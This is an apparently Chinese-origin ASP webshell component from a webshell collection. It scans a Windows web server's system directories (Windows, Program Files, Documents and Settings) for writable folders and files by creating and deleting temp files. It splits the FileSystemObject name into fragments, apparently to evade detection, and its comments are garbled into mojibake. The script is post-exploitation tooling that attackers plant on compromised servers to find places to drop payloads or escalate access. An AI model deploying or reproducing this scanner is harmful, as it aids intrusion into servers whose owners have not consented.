webshell/net-friend/asp/asp目录可写扫描/wt.asp

<%


Response.Buffer = True
Server.ScriptTimeOut=999999999
  
CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"


'<27><>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD> \ 
function GetFullPath(path)
	GetFullPath = path
	if Right(path,1) <> "\" then GetFullPath = path&"\" '<27><><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD><D6B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> \ <20>ľͼ<C4BE><CDBC><EFBFBD>
end function

'ɾ<><C9BE><EFBFBD>ļ<EFBFBD>
Function Deltextfile(filepath)
 On Error Resume Next
 Set objFSO = CreateObject(CONST_FSO) 
  if objFSO.FileExists(filepath) then '<27><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD> 
   objFSO.DeleteFile(filepath) 
  end if 
 Set objFSO = nothing
 Deltextfile = Err.Number '<27><><EFBFBD>ش<EFBFBD><D8B4><EFBFBD><EFBFBD><EFBFBD> 
End Function 


'<27><><EFBFBD><EFBFBD>Ŀ¼<C4BF>Ƿ<EFBFBD><C7B7><EFBFBD>д 0 Ϊ<>ɶ<EFBFBD>д 1Ϊ<31><CEAA>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɾ<EFBFBD><C9BE>
Function CheckDirIsOKWrite(DirStr)
	On Error Resume Next
	Set FSO = Server.CreateObject(CONST_FSO)
	filepath = GetFullPath(DirStr)&fso.GettempName
	FSO.CreateTextFile(filepath) 
	CheckDirIsOKWrite = Err.Number '<27><><EFBFBD>ش<EFBFBD><D8B4><EFBFBD><EFBFBD><EFBFBD> 
	if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
		Response.Write "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
	end if
	set fout =Nothing
	set FSO = Nothing
	Deltextfile(filepath) 'ɾ<><C9BE><EFBFBD><EFBFBD>
	if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
end Function

'<27><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD>޸<EFBFBD>(<28>˷<EFBFBD><CBB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD>޸<EFBFBD><DEB8><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD>ܻ<EFBFBD><DCBB>е㲻׼<E3B2BB><D7BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
function CheckFileWrite(filepath)
	On Error Resume Next
	Set FSO = Server.CreateObject(CONST_FSO)	
	set getAtt=FSO.GetFile(filepath)
	getAtt.Attributes = getAtt.Attributes
  CheckFileWrite = Err.Number 
	set FSO = Nothing
	set getAtt = Nothing  
end function

'<27><><EFBFBD><EFBFBD>Ŀ¼<C4BF>Ŀɶ<C4BF>д<EFBFBD><D0B4>
function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
	On Error Resume Next
	Set FSO = Server.CreateObject(CONST_FSO)
	B = FSO.FolderExists(Path)
	set FSO=nothing
	
  '<27>Ƿ<EFBFBD>Ϊ<EFBFBD><CEAA>ʱĿ¼<C4BF><C2BC><EFBFBD>Ƿ<EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD>
  IS_TEMP_DIR =	(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
  		
	if B=false then '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<C4BF>ͽ<EFBFBD><CDBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
	'==========================================================================
		Re = CheckFileWrite(Path) '<27><><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>д
		if Re =0 then
			Response.Write "[<5B>ļ<EFBFBD>]<font color=red>"&Path&"</font><br>"
			b =true
			exit function
		else
			Response.Write "[<font color=red><3E>ļ<EFBFBD></font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"						
			exit function
		end if	
	'==========================================================================	
	end if
	

	
	Path = GetFullPath(Path) '<27><> \	
	
	re = CheckDirIsOKWrite(Path) '<27><>ǰĿ¼Ҳ<C2BC><D2B2><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>
	if (re =0) or (re=1) then
		Response.Write "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
	end if

Set FSO = Server.CreateObject(CONST_FSO)
set f = fso.getfolder(Path)



if (CheckFile=True) and (IS_TEMP_DIR=false) then
b=false
'======================================
for each file in f.Files
	Re = CheckFileWrite(Path&file.name) '<27><><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>д
	if Re =0 then
		Response.Write "[<5B>ļ<EFBFBD>]<font color=red>"& Path&file.name&"</font><br>"
		b =true
	else
		if ShowNoWriteDir then Response.Write "[<font color=red><3E>ļ<EFBFBD></font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"			
	end if
next
if b then response.Flush '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݾ<EFBFBD>ˢ<EFBFBD>¿ͻ<C2BF><CDBB><EFBFBD><EFBFBD><EFBFBD>ʾ
'======================================
end if



'============= Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD> ================
for each file in f.SubFolders
if CheckNextDir=false then '<27>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>Ŀ¼
	re = CheckDirIsOKWrite(Path&file.name)
	if (re =0) or (re=1) then
		Response.Write "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
	end if
end if
	
	if (CheckNextDir=True) and (IS_TEMP_DIR=false) then '<27>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>Ŀ¼
			ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir '<27>ټ<EFBFBD><D9BC><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>Ŀ¼
	end if
next
'======================================
Set FSO = Nothing
set f = Nothing
end function


if Request("Paths") ="" then
Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"
if Session("paths")<>"" then  Paths_str=Session("paths")
	Response.Write "<form id='form1' name='form1' method='post' action=''>"
	Response.Write "<textarea name='Paths' cols='80' rows='10'>"&Paths_str&"</textarea>"
	Response.Write "<br />"
	Response.Write "<input type='submit' name='button' value='<27><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD>' />"
	Response.Write "<label for='CheckNextDir'>"
	Response.Write "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' /><3E><><EFBFBD><EFBFBD>Ŀ¼  "
	Response.Write "</label>"
	Response.Write "<label for='CheckFile'>"
	Response.Write "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked'  /><3E><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>"
	Response.Write "</label>"
	Response.Write "<label for='ShowNoWrite'>"
	Response.Write "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
	Response.Write "<22>Խ<EFBFBD>дĿ¼<C4BF><C2BC><EFBFBD>ļ<EFBFBD></label>"
	Response.Write "<label for='NoCheckTemp'>"
	Response.Write "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
	Response.Write "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱĿ¼</label>"	

	Response.Write "</form>"
else
Response.Write  "<a href=""?""><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7></a><br>"
CheckFile = (Request("CheckFile")="on")
CheckNextDir = (Request("CheckNextDir")="on")
ShowNoWriteDir = (Request("ShowNoWrite")="on")
NoCheckTemp = (Request("NoCheckTemp")="on")
Response.Write "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫһ<D2AA><D2BB><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD><EFBFBD>Ե<EFBFBD>......<br>"
response.Flush

Session("paths") = Request("Paths")

PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) 
For i=LBound(PathsSplit) To UBound(PathsSplit) 
if instr(PathsSplit(i),":")>0 then
	ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
End If 
Next
Response.Write "[ɨ<><C9A8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>]<br>"
end if



%>